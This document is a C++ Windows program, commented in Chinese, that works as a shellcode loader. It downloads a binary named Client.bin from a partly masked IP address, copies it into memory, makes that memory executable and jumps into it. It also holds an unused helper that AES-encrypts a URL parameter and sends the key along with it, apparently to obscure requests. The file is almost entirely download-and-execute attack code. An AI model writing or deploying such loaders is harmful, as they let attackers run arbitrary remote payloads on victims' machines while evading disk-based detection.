#include <Windows.h>
#include <WinINet.h>
#include <iostream>
#include <string>
#include <Shlwapi.h>
#include <bcrypt.h>
#include <wincrypt.h>
#include <vector>
#include <sstream>
#include <iomanip>
#include <ntstatus.h>
#pragma comment(lib, "Wininet.lib")
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif
// Base64编码
std::string base64_encode(const std::vector<BYTE>& data) {
static const char base64_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
std::string ret;
int i = 0, j = 0;
BYTE char_array_3[3], char_array_4[4];
for (auto byte : data) {
char_array_3[i++] = byte;
if (i == 3) {
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (i = 0; i < 4; i++) {
ret += base64_chars[char_array_4[i]];
}
i = 0;
}
}
if (i) {
for (j = i; j < 3; j++) {
char_array_3[j] = '\0';
}
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (j = 0; j < i + 1; j++) {
ret += base64_chars[char_array_4[j]];
}
while (i++ < 3) {
ret += '=';
}
}
return ret;
}
std::string url_encode(const std::string& str) {
std:stringstream escaped;
escaped.fill('0');
escaped << std::hex;
for (auto c : str) {
if (std::isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
escaped << c;
}
else {
escaped << std::uppercase;
escaped << '%' << std::setw(2) << int((unsigned char)c);
escaped << std::nouppercase;
}
}
return escaped.str();
}
std::string encrypt_url(const std::string& url) {
std::string param = "param=123456";
std::vector<BYTE> data(param.begin(), param.end());
BCRYPT_ALG_HANDLE hAlg = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_RNG_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
BYTE key[16] = { 0 };
if (BCryptGenRandom(hAlg, key, sizeof(key), 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptCloseAlgorithmProvider(hAlg, 0);
BCRYPT_KEY_HANDLE hKey = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
ULONG cbKeyObject = 0, cbData = 0, cbBlockLen = 0;
if (BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbKeyObject, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
if (BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PBYTE)&cbBlockLen, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BYTE* pbKeyObject = new BYTE[cbKeyObject];
if (BCryptGenerateSymmetricKey(hAlg, &hKey, pbKeyObject, cbKeyObject, key, sizeof(key), 0) != STATUS_SUCCESS) {
delete[] pbKeyObject;
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
delete[] pbKeyObject;
// 填充数据
size_t padding = cbBlockLen - (data.size() % cbBlockLen);
if (padding > 0) {
data.resize(data.size() + padding, (BYTE)padding);
}
// 加密数据
ULONG cbCipherText = (ULONG)data.size() + cbBlockLen;
BYTE* pbCipherText = new BYTE[cbCipherText];
memset(pbCipherText, 0, cbCipherText);
if (BCryptEncrypt(hKey, data.data(), (ULONG)data.size(), NULL, NULL, 0, pbCipherText, cbCipherText, &cbData, 0) != STATUS_SUCCESS) {
delete[] pbCipherText;
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
// 将密钥和密文进行Base64编码和URL编码
std::string encoded_key = base64_encode(std::vector<BYTE>(key, key + sizeof(key)));
std::string encoded_data = base64_encode(std::vector<BYTE>(pbCipherText, pbCipherText + cbData));
std::string encoded_url = url + "?" + param.substr(0, param.find("=") + 1) + url_encode(encoded_data) + "&key=" + url_encode(encoded_key);
// 清理内存
delete[] pbCipherText;
return encoded_url;
}
int main() {
std::wstring url = L"http://xxx.92.32.137/Client.bin";
HINTERNET hInternet = InternetOpenW(L"Download", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (hInternet == NULL) {
std::cout << "Failed to initialize WinINet." << std::endl;
return 1;
}
HINTERNET hUrl = InternetOpenUrlW(hInternet, url.c_str(), NULL, 0, INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_NO_CACHE_WRITE, 0);
if (hUrl == NULL) {
std::cout << "Failed to open URL." << std::endl;
InternetCloseHandle(hInternet);
return 1;
}
DWORD file_size = 0;
DWORD length = sizeof(file_size);
if (!HttpQueryInfoW(hUrl, HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, &file_size, &length, NULL)) {
std::cout << "Failed to get file size." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
LPVOID lpAddress = VirtualAlloc(NULL, file_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (lpAddress == NULL) {
std::cout << "Failed to allocate memory." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
DWORD bytes_read = 0;
if (!InternetReadFile(hUrl, lpAddress, file_size, &bytes_read)) {
std::cout << "Failed to read file." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
// 通过VirtualProtect将内存页属性设置为可执行
DWORD old_protect = 0;
if (!VirtualProtect(lpAddress, file_size, PAGE_EXECUTE_READ, &old_protect)) {
std::cout << "Failed to set memory page protection." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 1;
}
// 执行内存中的代码
((void(*)())lpAddress)();
// 释放内存
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 0;
}